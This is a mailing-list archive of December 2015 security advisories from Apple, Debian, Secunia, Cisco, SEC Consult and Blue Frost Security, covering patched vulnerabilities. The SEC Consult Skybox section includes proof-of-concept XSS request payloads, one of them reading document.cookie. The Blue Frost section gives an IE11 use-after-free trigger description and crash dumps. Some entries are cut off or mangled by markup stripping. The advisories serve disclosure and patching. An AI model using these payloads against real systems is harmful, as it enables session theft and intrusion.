improved bounds checking.
CVE-ID
CVE-2015-6978 : Jaanus Kp, Clarified Security, working with HP's Zero
Day Initiative

GasGauge
Available for:  Apple Watch Sport, Apple Watch, Apple Watch Edition,
and Apple Watch Hermes
Impact:  A malicious application may be able to execute arbitrary
code with system privileges
Description:  A memory corruption issue existed in the kernel. This
issue was addressed through improved memory handling.
CVE-ID
CVE-2015-6979 : PanguTeam

ImageIO
Available for:  Apple Watch Sport, Apple Watch, Apple Watch Edition,
and Apple Watch Hermes
Impact:  Processing a maliciously crafted image may lead to arbitrary
code execution
Description:  A memory corruption issue existed in ImageIO. This
issue was addressed through improved memory handling.
CVE-ID
CVE-2015-7053 : Apple

IOHIDFamily
Available for:  Apple Watch Sport, Apple Watch, Apple Watch Edition,
and Apple Watch Hermes
Impact:  A malicious application may be able to execute arbitrary
code with system privileges
Description:  Multiple memory corruption issues existed in
IOHIDFamily. These issues were addressed through improved memory
handling.
CVE-ID
CVE-2015-7111 : beist and ABH of BoB
CVE-2015-7112 : Ian Beer of Google Project Zero

IOKit SCSI
Available for:  Apple Watch Sport, Apple Watch, Apple Watch Edition,
and Apple Watch Hermes
Impact:  A malicious application may be able to execute arbitrary
code with kernel privileges
Description:  A null pointer dereference existed in the handling of a
certain userclient type. This issue was addressed through improved
validation.
CVE-ID
CVE-2015-7068 : Ian Beer of Google Project Zero

Kernel
Available for:  Apple Watch Sport, Apple Watch, Apple Watch Edition,
and Apple Watch Hermes
Impact:  A local application may be able to cause a denial of service
Description:  Multiple denial of service issues were addressed
through improved memory handling.
CVE-ID
CVE-2015-7040 : Lufeng Li of Qihoo 360 Vulcan Team
CVE-2015-7041 : Lufeng Li of Qihoo 360 Vulcan Team
CVE-2015-7042 : Lufeng Li of Qihoo 360 Vulcan Team
CVE-2015-7043 : Tarjei Mandt (@kernelpool)

Kernel
Available for:  Apple Watch Sport, Apple Watch, Apple Watch Edition,
and Apple Watch Hermes
Impact:  A local user may be able to execute arbitrary code with
kernel privileges
Description:  An issue existed in the parsing of mach messages. This
issue was addressed through improved validation of mach messages.
CVE-ID
CVE-2015-7047 : Ian Beer of Google

[SECURITY] [DSA 3414-1] xen security update

2015-12-10 Thread Moritz Muehlenhoff 
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA256

- -
Debian Security Advisory DSA-3414-1   secur...@debian.org
https://www.debian.org/security/   Moritz Muehlenhoff
December 09, 2015 https://www.debian.org/security/faq
- -

Package: xen
CVE ID : CVE-2015-3259 CVE-2015-3340 CVE-2015-5307 CVE-2015-6654 
 CVE-2015-7311 CVE-2015-7812 CVE-2015-7813 CVE-2015-7814
 CVE-2015-7969 CVE-2015-7970 CVE-2015-7971 CVE-2015-7972
 CVE-2015-8104

Multiple security issues have been found in the Xen virtualisation
solution, which may result in denial of service or information
disclosure.

For the oldstable distribution (wheezy), an update will be provided
later.

For the stable distribution (jessie), these problems have been fixed in
version 4.4.1-9+deb8u3.

For the unstable distribution (sid), these problems will be fixed soon.

We recommend that you upgrade your xen packages.

Further information about Debian Security Advisories, how to apply
these updates to your system and frequently asked questions can be
found at: https://www.debian.org/security/

Mailing list: debian-security-annou...@lists.debian.org
-BEGIN PGP SIGNATURE-
Version: GnuPG v2

iQIcBAEBCAAGBQJWaJIXAAoJEBDCk7bDfE42S90P/3px90Ze6eFrTI6CT6a5q7rh
/RV36XemP9n0I7BIo+QLeLnUVBSwFuOuqqIv7zeo+l3zkb40c+ledwdwMsQ/bchY
7g+ugwHI677qMJ5U29Xsl4DANqBHv1YUpMrraRxejHHKJLP8D5qt2vvG7jCTJj3S
rWQyqKhvr6ngMSmORLZ9buwVVsaQuiBr8Ngz7TI9V1EiirIv1vAQ88YTBoYICxv2
z1KSEvJCPSba4g7RYir2Dr6hQCBSXt8q7jZLa8tBlmkhJv3d+BEf3TR53Gpvlnn3
4I+Vl4+zxzO84cos4t3po5FXSIKsSFQnjFNQ9b7Uym4T/KdTP8b3FViRww/d0w7r
PtVldqDFMIeUp9goguCynCRspduoFPHYqGlPwdolurNZ+5FhO3nrzYv1kIwXY4oj
nk/wv5hEpWXiZseO92jXX2LydVDMURCBDRkyANB4sISb8y3kOUjnWYa48pzKHIl2
+go5lQjeJswlY/OQxLJ74Kk+XIOubIJyh2vN26SqbOkELS67EGXNJfLW/uGsvMqP
buhsvYJLhM9SxAXwtbf9ld7/58/XlKPyGMY8M/BFpVdii5JT9AgORMzl06/Vxk2M
mvuUmJW8jyLvi0pB8bYGcByFrfxY58/wAEgiw/Y+71QjBVAqi6Lu1pOzxW0o8hz4
qm62jLluGkmq/dkmKDKz
=xwRJ
-END PGP SIGNATURE-

Secunia Research: Microsoft Windows usp10.dll "GetFontDesc()" Integer Underflow Vulnerability

2015-12-10 Thread Secunia Research 
== 
 
Secunia Research 08/12/2015  

 Microsoft Windows usp10.dll "GetFontDesc()"
  Integer Underflow Vulnerability

== 
Table of Contents

Affected Software1
Severity.2
Description of Vulnerability.3
Solution.4
Time Table...5
Credits..6
References...7
About Secunia8
Verification.9

== 
1) Affected Software


* Microsoft Windows 7
* Microsoft Windows Server 2008

== 
2) Severity 

Rating: Highly critical
Impact: System Access
Where:  From remote
 
== 
3) Description of Vulnerability

Secunia Research has discovered a vulnerability in Microsoft Windows,
which can be exploited by malicious people to compromise a user's
system.

The vulnerability is caused due to an integer underflow error within
the "GetFontDesc()" function in usp10.dll when processing font files
cmap table and can be exploited to cause a heap-based buffer overflow
via a font file containing cmap table data with specially crafted
offset within encoding records.

Successful exploitation allows execution of arbitrary code.

== 
4) Solution 

Apply update provided by MS15-130.

== 
5) Time Table

09/10/2015 - Vendor notified.
12/10/2015 - Vendor response.
17/10/2015 - Status update provided by the vendor.
28/10/2015 - Vendor provides December 2015 as intended fix date.
08/12/2015 - Release of vendor patch and public disclosure.

== 
6) Credits 

Discovered by Hossein Lotfi, Secunia Research (now part of
Flexera Software).

== 
7) References


The Common Vulnerabilities and Exposures (CVE) project has assigned
the CVE-2015-6130 identifier for the vulnerability.
 
== 
8) About Secunia (now part of Flexera Software)

In September 2015, Secunia has been acquired by Flexera Software:

https://secunia.com/blog/435/

Secunia offers vulnerability management solutions to corporate
customers with verified and reliable vulnerability intelligence
relevant to their specific system configuration:

http://secunia.com/products/

Secunia also provides a publicly accessible and comprehensive advisory
database as a service to the security community and private 
individuals, who are interested in or concerned about IT-security.

http://secunia.com/advisories/

Secunia believes that it is important to support the community and to
do active vulnerability research in order to aid improving the 
security and reliability of software in general:

http://secunia.com/secunia_research/

Secunia regularly hires new skilled team members. Check the URL below
to see currently vacant positions:

http://secunia.com/company/jobs/

== 
9) Verification 

Please verify this advisory by visiting the Secunia website:
http://secunia.com/secunia_research/2015-6/

Complete list of vulnerability reports published by Secunia Research:
http://secunia.com/secunia_research/

==

APPLE-SA-2015-12-08-6 Xcode 7.2

2015-12-10 Thread Apple Product Security 

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA512

APPLE-SA-2015-12-08-6 Xcode 7.2

Xcode 7.2 is now available and addresses the following:

Git
Available for:  OS X Yosemite v10.10.5 or later
Impact:  Multiple vulnerabilities existed in Git
Description:  Multiple vulnerabilities existed in Git versions prior
to 2.5.4. These were addressed by updating Git to version 2.5.4.
CVE-ID
CVE-2015-7082

IDE SCM
Available for:  OS X Yosemite v10.10.5 or later
Impact:  Intentionally untracked files may be uploaded to
repositories
Description:  Xcode did not honor the .gitignore directive. This
issue was addressed by adding support to honor .gitignore file.
CVE-ID
CVE-2015-7056 : Stephen Lardieri

otools
Available for:  OS X Yosemite v10.10.5 or later
Impact:  A local attacker may be able to cause unexpected application
termination or arbitrary code execution
Description:  Multiple memory corruption issues existed in the
processing of mach-o files. These issues were addressed through
improved memory handling.
CVE-ID
CVE-2015-7049 : Proteas of Qihoo 360 Nirvan Team
CVE-2015-7057 : Proteas of Qihoo 360 Nirvan Team

Installation note:

Xcode 7.2 may be obtained from:
https://developer.apple.com/xcode/downloads/

To check that the Xcode has been updated:

* Select Xcode in the menu bar
* Select About Xcode
* The version after applying this update will be "7.2".

Information will also be posted to the Apple Security Updates
web site: https://support.apple.com/kb/HT201222

This message is signed with Apple's Product Security PGP key,
and details are available at:
https://www.apple.com/support/security/pgp/
-BEGIN PGP SIGNATURE-
Comment: GPGTools - https://gpgtools.org

iQIcBAEBCgAGBQJWZzRaAAoJEBcWfLTuOo7td2kP/Ag61Qpz8uA8MgClf9SbFJau
FNMDPV7ZOLPPc+DA37rQIwQemSe8dkt4Jnc6TOcTQdR7+f+Mt0QgscDW9xlOlYT4
Ofg5h5XnrKQ02DBkptD4ms5RH8JAHDKCYj8WttlBnBVsJMb6H3s5Om6vfubXkb7t
6bdUMe7iCgRsGuRrBuzPfxjMzh2ilnWML1B6VJkRi6rMnWTW2a66BWvfqLL1Cv2h
1ybIaJi1wsw0lTxGIb+bNM8lg+EL4JLEV+DSJ6mFtDpF6dQBqndbxjopbO5l6LzT
rnWtFTQQ1/6SAM11n9bbDOQj8w8QW3v0CAyad4HN+5Ayk/qnuJZ8o1ycSGAIrQgr
HCzG8RELjK9ipgkdu5daXUc75SGVPuuwobQM6SNzrg5M6SVzIvVdSibTwfgnDvgu
PQO6mBZXLewSBoWqJAQnoDJXExSJ67IE5RzXwvg5KQcF+81Toj48HUxxd98PKrnI
gPbhf8QT9/asGupN4wh3JjN73/qm2BwpJsbPvVj42Ew1OnsBgldpEL1Ssl/2qX0O
pPi1pfF6PIFQUrbloWyYC+lIJuydb3FZUYKLR6HSn7v7RrZu5n8Uvj+5VX3TyVOi
5WzXvbHd9L3exphb8SnITTUdZX6LzkUgRrQRvGWTzT/AfIHQRAyliyk7BgYRqzHH
ObtqW74YB0YXaiw1ckGl
=FxUB
-END PGP SIGNATURE-

Cisco Security Advisory: Vulnerability in Java Deserialization Affecting Cisco Products

2015-12-10 Thread Cisco Systems Product Security Incident Response Team 
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA256

Cisco Security Advisory: Vulnerability in Java Deserialization Affecting Cisco 
Products

Advisory ID: cisco-sa-20151209-java-deserialization

Revision 1.0

For Public Release: 2015 December 9 16:00  GMT
+-

Summary
===

A vulnerability in the Java deserialization used by the Apache Commons 
Collections (ACC) library could allow an unauthenticated, remote attacker to 
execute arbitrary code.

The vulnerability is due to insecure deserialization of user-supplied content 
by the affected software. An attacker could exploit this vulnerability by 
submitting crafted input to an application on a targeted system that uses the 
ACC library. After the vulnerable library on the affected system deserializes 
the content, the attacker could execute arbitrary code on the system, which 
could be used to conduct further attacks.

On November 6, 2015, Foxglove Security Group published information about a 
remote code execution vulnerability that affects multiple releases of the ACC 
library. The report contains detailed proof-of-concept code for a number of 
applications, including WebSphere Application Server, JBoss, Jenkins, OpenNMS, 
and WebLogic. This is a remotely exploitable vulnerability that allows an 
attacker to inject any malicious code or execute any commands that exist on the 
server. A wide range of potential impacts includes allowing the attacker to 
obtain sensitive information.

Object serialization is a technique that many programming languages use to 
convert an object into a sequence of bits for transfer purposes. 
Deserialization is a technique that reassembles those bits back to an object. 
This vulnerability occurs in Java object serialization for network transport 
and object deserialization on the receiving side.

Many applications accept serialized objects from the network without performing 
input validation checks before deserializing it. Crafted serialized objects can 
therefore lead to execution of arbitrary attacker code.

Although the problem itself is in the serialization and deserialization 
functionality of the Java programming language, the ACC library is known to be 
affected by this vulnerability. Any application or application framework could 
be vulnerable if it uses the ACC library and deserializes arbitrary, 
user-supplied Java serialized data.

Additional details about the vulnerability are available at the following links:

Official Vulnerability Note from CERT:
http://www.kb.cert.org/vuls/id/576313

Foxglove Security:
http://foxglovesecurity.com/2015/11/06/what-do-weblogic-websphere-jboss-jenkins-opennms-and-your-application-have-in-common-this-vulnerability/

Apache Commons Statement:
https://blogs.apache.org/foundation/entry/apache_commons_statement_to_widespread

Oracle Security Alert:
https://blogs.oracle.com/security/entry/security_alert_cve_2015_4852

Cisco will release software updates that address this vulnerability. There are 
no workarounds that mitigate this vulnerability.

This advisory is available at the following link:
http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20151209-java-deserialization

-BEGIN PGP SIGNATURE-
Comment: GPGTools - http://gpgtools.org

iQIcBAEBCAAGBQJWaE9BAAoJEIpI1I6i1Mx31a0QALya6VDmcGiyx3AlCzsKGISc
3NJP4PPjVFGjHQmB/+bXn1zXLZ63JgbOZuG9pLxhmJpPMxQI8jeXEHqzVmrA9cOj
u/QRGkITxQaRS50cwFJXPDOVWWCTcHLhuk83Ofih8vhC8UPBy1FGMBl5rpVLDkG9
ue8yX5ACEQ078F78dpcnJmbv1Hxu021wI+nM3pn7C/aOrJ1wSNop8KkFZ+VHzbKY
aeuMFqhal+ePx+JoIC4JMrTll/BLxjI17tKrzXas6D4zKNGSO0WxnEFjDWuPlc89
2y3DnaVc0eeAVPy3ODN6wJzuro4w69z1GrvXPkBfVe9WNKD1lMGRUPMRwnb/zjxu
DT8Ms4LDaVCLDZ01ox3BpuZIDBP1q2Xk6ToObeHUNMSDM9IuMeVOz9BtxJxO8Yp/
YfVaoqkM6Vrf5oXKUvWow0r19+ODp18JUnc8qT7Cj0b9PwtlOUqpsNE+cAzPyZh7
UBYLPm2AZypOgw4ryUf66p3l+NGLvLdA+A1u0m+YfXSrsuEFCosUeppmZMvgzEME
7TDSbOlt6yj9W/U3ioYbhLWk1D2whTyDybXz4MLaPTPxfxozyePOcthU7R/PVGrU
M0Do8nugnDXE0rYVRooF3+A/6ahoKUb9QR00O4xN4A94lfXqgc6t+180S4vavgxS
g9ZP7zYVhaDCRufDoNVI
=nsL1
-END PGP SIGNATURE-

APPLE-SA-2015-12-08-3 OS X El Capitan 10.11.2 and Security Update 2015-008

2015-12-10 Thread Apple Product Security 
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA512

APPLE-SA-2015-12-08-3 OS X El Capitan 10.11.2 and Security Update 2015-008

OS X El Capitan 10.11.2 and Security Update 2015-008 is now available
and addresses the following:

apache_mod_php
Available for:  OS X El Capitan v10.11 and v10.11.1
Impact:  Multiple vulnerabilities in PHP
Description:  Multiple vulnerabilities existed in PHP versions prior
to 5.5.29, the most serious of which may have led to remote code
execution. These were addressed by updating PHP to version 5.5.30.
CVE-ID
CVE-2015-7803
CVE-2015-7804

AppSandbox
Available for:  OS X El Capitan v10.11 and v10.11.1
Impact:  A malicious application may maintain access to Contacts
after having access revoked
Description:  An issue existed in the sandbox's handling of hard
links. This issue was addressed through improved hardening of the app
sandbox.
CVE-ID
CVE-2015-7001 : Razvan Deaconescu and Mihai Bucicoiu of University
POLITEHNICA of Bucharest; Luke Deshotels and William Enck of North
Carolina State University; Lucas Vincenzo Davi and Ahmad-Reza Sadeghi
of TU Darmstadt

Bluetooth
Available for:  OS X El Capitan v10.11 and v10.11.1
Impact:  A local user may be able to execute arbitrary code with
system privileges
Description:  A memory corruption issue existed in the Bluetooth HCI
interface. This issue was addressed through improved memory handling.
CVE-ID
CVE-2015-7108 : Ian Beer of Google Project Zero

CFNetwork HTTPProtocol
Available for:  OS X El Capitan v10.11 and v10.11.1
Impact:  An attacker with a privileged network position may be able
to bypass HSTS
Description:  An input validation issue existed within URL
processing. This issue was addressed through improved URL validation.
CVE-ID
CVE-2015-7094 : Tsubasa Iinuma (@llamakko_cafe) of Gehirn Inc. and
Muneaki Nishimura (nishimunea)

Compression
Available for:  OS X El Capitan v10.11 and v10.11.1
Impact:  Visiting a maliciously crafted website may lead to arbitrary
code execution
Description:  An uninitialized memory access issue existed in zlib.
This issue was addressed through improved memory initialization and
additional validation of zlib streams.
CVE-ID
CVE-2015-7054 : j00ru

Configuration Profiles
Available for:  OS X El Capitan v10.11 and v10.11.1
Impact:  A local attacker may be able to install a configuration
profile without admin privileges
Description:  An issue existed when installing configuration
profiles. This issue was addressed through improved authorization
checks.
CVE-ID
CVE-2015-7062 : David Mulder of Dell Software

CoreGraphics
Available for:  OS X Mavericks v10.9.5, OS X Yosemite v10.10.5,
OS X El Capitan v10.11 and v10.11.1
Impact:  Processing a maliciously crafted font file may lead to
arbitrary code execution
Description:  A memory corruption issue existed in the processing of
font files. This issue was addressed through improved input
validation.
CVE-ID
CVE-2015-7105 : John Villamil (@day6reak), Yahoo Pentest Team

CoreMedia Playback
Available for:  OS X Mavericks v10.9.5, OS X Yosemite v10.10.5,
OS X El Capitan v10.11 and v10.11.1
Impact:  Visiting a maliciously crafted website may lead to arbitrary
code execution
Description:  Multiple memory corruption issues existed in the
processing of malformed media files. These issues were addressed
through improved memory handling.
CVE-ID
CVE-2015-7074 : Apple
CVE-2015-7075

Disk Images
Available for:  OS X El Capitan v10.11 and v10.11.1
Impact:  A local user may be able to execute arbitrary code with
kernel privileges
Description:  A memory corruption issue existed in the parsing of
disk images. This issue was addressed through improved memory
handling.
CVE-ID
CVE-2015-7110 : Ian Beer of Google Project Zero

EFI
Available for:  OS X El Capitan v10.11 and v10.11.1
Impact:  A local user may be able to execute arbitrary code with
system privileges
Description:  A path validation issue existed in the kernel loader.
This was addressed through improved environment sanitization.
CVE-ID
CVE-2015-7063 : Apple

File Bookmark
Available for:  OS X El Capitan v10.11 and v10.11.1
Impact:  A sandboxed process may be able to circumvent sandbox
restrictions
Description:  A path validation issue existed in app scoped
bookmarks. This was addressed through improved environment
sanitization.
CVE-ID
CVE-2015-7071 : Apple

Hypervisor
Available for:  OS X El Capitan v10.11 and v10.11.1
Impact:  A local user may be able to execute arbitrary code with
system privileges
Description:  A use after free issue existed in the handling of VM
objects. This issue was addressed through improved memory management.
CVE-ID
CVE-2015-7078 : Ian Beer of Google Project Zero

iBooks
Available for:  OS X El Capitan v10.11 and v10.11.1
Impact:  Parsing a maliciously crafted iBooks file may lead to
disclosure of user information
Description:  An XML external entity reference issue existed with
iBook parsing. This issue was addressed through improved parsing.
CVE-ID
CVE-2015-7081 : Behrouz Sadeghipour (@Nahamsec) and

SEC Consult SA-20151210-0 :: Skybox Platform Multiple Vulnerabilities

2015-12-10 Thread SEC Consult Vulnerability Lab 
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA256

SEC Consult Vulnerability Lab Security Advisory < 20151210-0 >
===
  title: Multiple Vulnerabilities
product: Skybox Platform
 vulnerable version: <=7.0.611
  fixed version: 7.5.401
 CVE number:
 impact: Critical
   homepage: www.skyboxsecurity.com/products/appliance
  found: 2014-12-04
 by: K. Gudinavicius, M. Heinzl, C. Schwarz (Office Singapore)
 SEC Consult Vulnerability Lab
 An integrated part of SEC Consult
 Bangkok - Berlin - Frankfurt/Main - Montreal - Moscow
 Singapore - Vienna (HQ) - Vilnius - Zurich
 https://www.sec-consult.com
===

Vendor description:
- ---
"Skybox Security provides cutting-edge risk analytics for enterprise security
management. Our solutions give you complete network visibility, help you
eliminate attack vectors, and optimize your security management processes.
Protect the network and the business."
Source: http://www.skyboxsecurity.com/

Business recommendation:
- 
Attackers are able to perform Cross-Site Scripting and SQL Injection attacks
against the Skybox platform. Furthermore, it is possible for
unauthenticated attackers to download arbitrary files and execute arbitrary
code.

SEC Consult recommends the vendor to conduct a comprehensive security
analysis, based on security source code reviews, in order to identify all
available vulnerabilities in the Skybox platform and increase the security
of its customers.

Vulnerability overview/description:
- ---
1) Multiple Reflected Cross-Site Scripting Vulnerabilities
2) Multiple Stored Cross-Site Scripting Vulnerabilities
3) Arbitrary File Download and Directory Traversal Vulnerability
4) Blind SQL Injection Vulnerability
5) Remote Unauthenticated Code Execution

Proof of concept:
- -
1) Multiple Reflected Cross-Site Scripting Vulnerabilities
Multiple scripts are prone to reflected Cross-Site Scripting attacks.
The following example demonstrates this issue with the
service VersionRepositoryWebService:

POST /skyboxview/webservice/services/VersionRepositoryWebService HTTP/1.0
Content-type: text/plain
User-Agent: Axis/1.4
Host: localhost:8282
SOAPAction: ""
Content-Length: 863
http://schemas.xmlsoap.org/soap/envelope/;
xmlns:xsd="http://www.w3.org/2001/XMLSchema;
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance;>http://schemas.xmlsoap.org/soap/encoding/;
xmlns:ns1="http://com/skybox/view/webservice/versionrepositoryc4f85
t;a
xmlns:a=http://www.w3.org/1999/xhtmla:body
onload=alert(1)//a9884933253b">http://schemas.xmlsoap.org/soap/encoding/;>Applicationhttp://schemas.xmlsoap.org/soap/encoding/;>windows-64http://schemas.xmlsoap.org/soap/encoding/;>7.0.601

Other scripts and parameters, such as the parameter status of the login script
(located at https://localhost:444/login.html) are affected as well. The
following request demonstrates this issue:
https://localhost:444/login.html?status=%27%3C/script%3E%3Cscript%3Ealert%28doc
ument.cookie%29%3C/script%3E

2) Multiple Stored Cross-Site Scripting Vulnerabilities
Multiple fields of the Skybox Change Manager, which can be accessed at
https://localhost:8443/skyboxview/, are prone to stored Cross-Site Scripting
attacks. For example when creating a new ticket, the title can be misused
to insert JavaScript code. The following request to the server demonstrates
the issue:

Request:
POST /skyboxview/webskybox/tickets HTTP/1.1
Host: localhost:8443
[...]
7|0|18|https://localhost:8443/skyboxview/webskybox/|2725E|com.skybox.view.g
wt.client.service.TicketsService|createAccessChangeTicket|com.skybox.view.trans
fer.netmodel.tickets.AccessChangeTicketData/1874789321|com.skybox.view.transfer
.modelview.ChangeRequestGraph/1577593632|com.skybox.view.transfer.netmodel.phas
es.BasePhaseOperation/3921542662|java.util.Collection|com.skybox.view.transfer.
netmodel.PhaseDefinitionId/3246549697|java.lang.String/2004016611|com.skybox.vi
ew.transfer.properties.PropertyBag/343216801|com.skybox.view.transfer.netmodel.
TicketWorkflowId/3953158119|com.skybox.view.transfer.netmodel.ConfigurationItem
Id/1448062761|com.skybox.view.transfer.netmodel.tickets.ChangeRequestRiskEnum/8
52682809||skyboxview|test">|java.util.ArrayList/41

Other fields, like "Comments" and "Description", are affected as well.

3) Arbitrary File Download and Directory Traversal Vulnerability
Skybox Change Manager allows to upload and download attachments for tickets.
The download functionality can be exploited to download arbitrary files. No
authentication is required to exploit this vulnerability.

BFS-SA-2015-003: Internet Explorer CObjectElement Use-After-Free Vulnerability

2015-12-10 Thread Blue Frost Security Research Lab 
Blue Frost Security GmbH
https://www.bluefrostsecurity.de/   research(at)bluefrostsecurity.de
BFS-SA-2015-003 10-December-2015


Vendor: Microsoft, http://www.microsoft.com
Affected Products:  Internet Explorer
Affected Version:   IE 11
Vulnerability:  MSHTML!CObjectElement Use-After-Free Vulnerability
CVE ID: CVE-2015-6152


I.   Impact

This vulnerability allows the execution of arbitrary code on vulnerable
installations of Microsoft Internet Explorer. User interaction is required to
exploit this vulnerability in that the target must visit a malicious page or
open a malicious file.



II.  Vulnerability Details

Microsoft Internet Explorer 11 is prone to a use-after-free vulnerability in
the MSHTML!CTreeNode::ComputeFormatsHelper function. The analysis was performed
on Internet Explorer 11 running on Windows 7 SP1 (x64).

The following HTML page can be used to reproduce the issue:





small{ -ms-block-progression: lr; -ms-filter: "vv"; }


function trigger() { document.execCommand("JustifyLeft"); }

bluefrost
security
trigger();


With page heap enabled and the Memory Protect feature turned off, visiting
that page results in the following crash:

(2d4.830): Access violation - code c005 (!!! second chance !!!)
eax=09b09e90 ebx=125b4e60 ecx= edx=6e9fedf0 esi=0f552fa0 edi=0f552fa0
eip=6dfcc19b esp=097fb520 ebp=097fc1f0 iopl=0 nv up ei pl zr na pe nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b efl=00010246
MSHTML!CTreeNode::ComputeFormatsHelper+0x53:
6dfcc19b f740240300  testdword ptr [eax+24h],3h 
ds:002b:09b09eb4=

0:007> !heap -p -a @eax
address 09b09e90 found in
_DPH_HEAP_ROOT @ 9b01000
in free-ed allocation (  DPH_HEAP_BLOCK: VirtAddr VirtSize)
9b01f04:  9b09000 2000
748090b2 verifier!AVrfDebugPageHeapFree+0x00c2
77e61b1c ntdll!RtlDebugFreeHeap+0x002f
77e1ae8a ntdll!RtlpFreeHeap+0x005d
77dc2b65 ntdll!RtlFreeHeap+0x0142
758814ad kernel32!HeapFree+0x0014
6d92d219 MSHTML!MemoryProtection::CMemoryProtector::ProtectedFree+0x0122
6dc46583 MSHTML!CObjectElement::`vector deleting destructor'+0x0023
6dfce0db MSHTML!CElement::PrivateRelease+0x027e
6d98953d MSHTML!CObjectElement::DeferredFallback+0x033d
6d96e1b3 MSHTML!GlobalWndOnMethodCall+0x017b
6d95577e MSHTML!GlobalWndProc+0x012e
770762fa user32!InternalCallWinProc+0x0023
77076d3a user32!UserCallWinProcCheckWow+0x0109
770777c4 user32!DispatchMessageWorker+0x03bc
7707788a user32!DispatchMessageW+0x000f
6ebfa7b8 IEFRAME!CTabWindow::_TabWindowThreadProc+0x0464
6ec38de8 IEFRAME!LCIETab_ThreadProc+0x03e7
76a9e81c iertutil!CMemBlockRegistrar::_LoadProcs+0x0067
747b4b01 IEShims!NS_CreateThread::DesktopIE_ThreadProc+0x0094
7588336a kernel32!BaseThreadInitThunk+0x000e
77dc9882 ntdll!__RtlUserThreadStart+0x0070
77dc9855 ntdll!_RtlUserThreadStart+0x001b

We can see that a freed CObjectElement object is accessed in the
MSHTML!CTreeNode::ComputeFormatsHelper function. If we take a look at the
memory just before the CObjectElement destructor is called, we can see where
the object was initially allocated.

0:007> bu MSHTML!CObjectElement::~CObjectElement
0:007> g
Breakpoint 0 hit
eax=6daf6b10 ebx= ecx=0980de90 edx=0f834bb0 esi=0980de90 edi=094bc324
eip=6dc4658f esp=094bc310 ebp=094bc318 iopl=0 nv up ei ng nz na pe cy
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b efl=0287
MSHTML!CObjectElement::~CObjectElement:
0:007> !heap -p -a poi(@esp+4)
address 09b09e90 found in
_DPH_HEAP_ROOT @ 9b01000
in busy allocation (  DPH_HEAP_BLOCK: UserAddr UserSize -   
  VirtAddr VirtSize)
 9b01f04:  9b09e90  170 -   
   9b09000 2000
  MSHTML!CObjectElement::`vftable'
74808e89 verifier!AVrfDebugPageHeapAllocate+0x0229
77e6134e ntdll!RtlDebugAllocateHeap+0x0030
77e1b16e ntdll!RtlpAllocateHeap+0x00c4
77dc2fe3 ntdll!RtlAllocateHeap+0x023a
6daf6a27 MSHTML!CObjectElement::CreateElement+0x0017
6e0423a4 MSHTML!CHtmParse::ParseBeginTag+0x00b8
6df17172 MSHTML!CHtmParse::ParseToken+0x0096
6df16a0f MSHTML!CHtmPost::ProcessTokens+0x04c7
6dd8341b MSHTML!CHtmPost::Exec+0x0207
6da308a8 MSHTML!CHtmPost::Run+0x003d
6da3080e MSHTML!PostManExecute+0x0061
6da2727c MSHTML!PostManResume+0x007b